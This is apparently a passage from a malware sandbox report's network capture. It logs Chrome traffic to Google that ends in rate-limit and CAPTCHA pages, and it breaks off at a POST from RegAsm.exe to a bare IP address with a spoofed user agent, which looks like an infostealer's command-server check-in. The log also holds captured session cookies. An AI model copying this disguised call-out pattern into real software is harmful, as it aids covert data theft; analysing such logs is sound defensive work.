NID=513=X7agUV7zOCFoOtTxTc64LhX4Q-MjgkJDCdRapncbi5H2ZgSdgy6rNw3YSVpooIKFmcT-jIEoIN13NRX1tB-DxDB3Xdzc1tLkFplO7teaHv4j_NeS6NUvkNPpO038FBGchxnYqhn57DZ8pR3F9FuYQbNLqILBBxMVGoU2A-zrMxQ; expires=Tue, 29-Oct-2024 20:13:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-29 20:13:03 UTC	458	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49741	142.250.191.164	443	7872	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:03 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-29 20:13:03 UTC	1761	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGM_-v7EGIjC59ZRJ1dYmOVgs9zYixs7a6VS3cYG9RFenPtHDW-sQCDxbcp_6fD5d67UVJ_1caB4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIz_6_sQYQ-pX-3wESBFG1Plo Content-Type: text/html; charset=UTF-8 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Mon, 29 Apr 2024 20:13:03 GMT Server: gws Content-Length: 417 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-29-20; expires=Wed, 29-May-2024 20:13:03 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=cIMMZtqmh6t-ZNb5ohuS4PH2i61rW71JY7znO1ddH1_uceUi-6Hm3qZISAfahQZkGaLWOdZ9tV2lM-42s4Ly1VLL5UjczH-LAyhADw3FpSjptbMY6F-O211qsbcNlykvtRHjwWfwDAEecmDsqwdf9tK3HCDPSVXQDLhhjwSCwio; expires=Tue, 29-Oct-2024 20:13:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-29 20:13:03 UTC	417	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49742	142.250.191.164	443	7872	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:04 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-29 20:13:04 UTC	1795	IN	HTTP/1.1 200 OK Date: Mon, 29 Apr 2024 20:13:04 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-GRlmJwVWtARpadfAbVq8jg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Viewport-Width Accept-CH: Sec-CH-Viewport-Height Accept-CH: Sec-CH-DPR Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-04-29 20:13:04 UTC	1795	IN	Data Raw: 61 33 36 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 73 6f 75 74 68 77 65 73 74 20 61 69 72 6c 69 6e 65 73 20 66 6c 69 67 68 74 73 22 2c 22 78 62 6f 78 20 69 6e 64 69 65 20 67 61 6d 65 20 73 68 6f 77 63 61 73 65 22 2c 22 63 68 61 6c 6c 65 6e 67 65 72 73 20 6d 6f 76 69 65 22 2c 22 74 61 6d 70 61 20 62 61 79 20 72 61 79 73 20 63 69 74 79 20 63 6f 6e 6e 65 63 74 20 75 6e 69 66 6f 72 6d 73 22 2c 22 73 70 61 63 65 78 20 66 61 6c 63 6f 6e 20 39 20 72 6f 63 6b 65 74 20 6c 61 75 6e 63 68 65 73 22 2c 22 6d 69 6c 6c 69 6f 6e 20 64 6f 6c 6c 61 72 20 62 61 62 79 20 74 6f 6d 6d 79 20 72 69 63 68 6d 61 6e 20 6c 79 72 69 63 73 22 2c 22 72 6f 79 61 6c 20 63 61 72 69 62 62 65 61 6e 20 61 6c 61 73 6b 61 20 63 72 75 69 73 65 20 63 61 6e 63 65 6c 6c 65 64 22 2c 22 61 70 70 6c 65 Data Ascii: a36)]}'["",["southwest airlines flights","xbox indie game showcase","challengers movie","tampa bay rays city connect uniforms","spacex falcon 9 rocket launches","million dollar baby tommy richman lyrics","royal caribbean alaska cruise cancelled","apple
2024-04-29 20:13:04 UTC	826	IN	Data Raw: 4a 56 33 64 6c 4d 30 6c 4e 4b 7a 64 50 61 6e 51 34 64 54 46 35 63 6e 4a 71 52 6c 42 69 53 6b 74 78 5a 55 59 30 56 6d 46 56 53 6b 56 6d 53 57 4e 72 5a 30 31 4e 59 6b 56 6e 61 47 64 45 4d 6b 6b 79 65 47 38 35 53 6e 5a 74 52 58 4e 73 57 46 56 46 56 6b 68 45 54 6b 78 45 4e 46 6b 31 4d 6d 70 52 5a 30 4a 77 61 6d 78 7a 63 56 4e 52 51 30 46 43 4b 31 6c 75 51 54 6c 74 4b 33 46 4d 4d 56 52 4f 57 6e 49 30 57 57 46 55 62 55 39 33 61 32 68 52 52 58 4e 57 65 57 56 74 56 6b 38 76 64 7a 42 52 63 58 41 33 65 46 46 35 54 46 56 57 53 7a 46 54 64 45 64 52 5a 57 56 54 52 6c 64 44 62 6d 4a 48 4e 56 42 31 4e 6d 64 6c 4e 31 4a 55 5a 31 64 70 62 6e 46 79 62 32 4a 30 56 6b 52 36 63 30 46 7a 55 6b 6b 7a 51 79 73 7a 4e 43 39 33 51 57 46 4a 5a 6e 6c 34 5a 6b 31 61 61 56 6c 48 65 57 Data Ascii: JV3dlM0lNKzdPanQ4dTF5cnJqRlBiSktxZUY0VmFVSkVmSWNrZ01NYkVnaGdEMkkyeG85SnZtRXNsWFVFVkhETkxENFk1MmpRZ0JwamxzcVNRQ0FCK1luQTltK3FMMVROWnI0WWFUbU93a2hRRXNWeWVtVk8vdzBRcXA3eFF5TFVWSzFTdEdRZWVTRldDbmJHNVB1NmdlN1JUZ1dpbnFyb2J0VkR6c0FzUkkzQyszNC93QWFJZnl4Zk1aaVlHeW
2024-04-29 20:13:04 UTC	1255	IN	Data Raw: 35 32 65 0d 0a 6d 64 58 70 57 56 56 6f 31 4e 6b 59 78 56 31 56 71 51 6a 56 6f 61 30 56 68 52 31 55 78 65 58 49 32 54 57 73 7a 55 30 70 77 53 53 73 77 62 45 39 76 56 6d 78 51 64 54 4a 43 53 44 64 68 64 7a 4a 52 63 32 4a 4e 4d 56 46 78 62 7a 55 34 55 58 64 79 56 58 4a 6f 55 55 64 42 4d 48 45 77 62 47 52 6a 54 30 4d 31 52 6c 4a 76 64 6e 52 47 63 48 46 49 53 6c 64 49 55 47 31 6f 59 6e 5a 35 4b 32 35 77 63 54 52 59 56 33 46 79 64 6b 35 69 59 57 52 31 56 57 4a 6a 4f 56 4e 34 65 56 51 76 51 55 56 78 5a 6a 63 32 4d 31 45 79 4e 6e 42 79 4e 46 46 69 64 56 56 61 5a 30 35 73 57 45 39 43 4b 79 74 70 62 56 46 78 57 55 4e 43 56 6b 64 69 52 48 68 6f 57 6e 46 70 62 46 6f 77 63 55 56 71 62 44 56 54 56 6d 70 75 57 47 78 69 54 30 35 32 56 48 4a 77 5a 57 64 78 4e 31 5a 55 56 Data Ascii: 52emdXpWVVo1NkYxV1VqQjVoa0VhR1UxeXI2TWszU0pwSSswbE9vVmxQdTJCSDdhdzJRc2JNMVFxbzU4UXdyVXJoUUdBMHEwbGRjT0M1RlJvdnRGcHFISldIUG1oYnZ5K25wcTRYV3Fydk5iYWR1VWJjOVN4eVQvQUVxZjc2M1EyNnByNFFidVVaZ05sWE9CKytpbVFxWUNCVkdiRHhoWnFpbFowcUVqbDVTVmpuWGxiT052VHJwZWdxN1ZUV
2024-04-29 20:13:04 UTC	78	IN	Data Raw: 73 74 74 79 70 65 22 3a 5b 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a Data Ascii: sttype":["QUERY","QUERY","ENTITY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
2024-04-29 20:13:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49744	142.250.191.164	443	7872	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:04 UTC	738	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGM_-v7EGIjC59ZRJ1dYmOVgs9zYixs7a6VS3cYG9RFenPtHDW-sQCDxbcp_6fD5d67UVJ_1caB4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-29-20; NID=513=X7agUV7zOCFoOtTxTc64LhX4Q-MjgkJDCdRapncbi5H2ZgSdgy6rNw3YSVpooIKFmcT-jIEoIN13NRX1tB-DxDB3Xdzc1tLkFplO7teaHv4j_NeS6NUvkNPpO038FBGchxnYqhn57DZ8pR3F9FuYQbNLqILBBxMVGoU2A-zrMxQ
2024-04-29 20:13:04 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Mon, 29 Apr 2024 20:13:04 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3111 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-29 20:13:04 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-04-29 20:13:04 UTC	1255	IN	Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 49 5a 71 55 51 30 5a 37 5a 51 71 42 31 33 78 44 2d 34 6f 75 57 74 38 38 43 4d 6d 38 73 34 4d 5a 4b Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="IZqUQ0Z7ZQqB13xD-4ouWt88CMm8s4MZK
2024-04-29 20:13:04 UTC	957	IN	Data Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49745	142.250.191.164	443	7872	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:04 UTC	912	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGM_-v7EGIjCEhPLSBTrZPAY39cVYHNd6_L3Rxj8WO6tEohgLxJlwyjn4Ct7LVz-jrTx9H46727MyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-29-20; NID=513=X7agUV7zOCFoOtTxTc64LhX4Q-MjgkJDCdRapncbi5H2ZgSdgy6rNw3YSVpooIKFmcT-jIEoIN13NRX1tB-DxDB3Xdzc1tLkFplO7teaHv4j_NeS6NUvkNPpO038FBGchxnYqhn57DZ8pR3F9FuYQbNLqILBBxMVGoU2A-zrMxQ
2024-04-29 20:13:04 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Mon, 29 Apr 2024 20:13:04 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3183 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-29 20:13:04 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2024-04-29 20:13:04 UTC	1255	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 55 69 6e 4b 38 5f 44 6a 66 Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="UinK8_Djf
2024-04-29 20:13:04 UTC	1029	IN	Data Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49743	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:04 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAECFHJEBAAFIEBGHIIE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
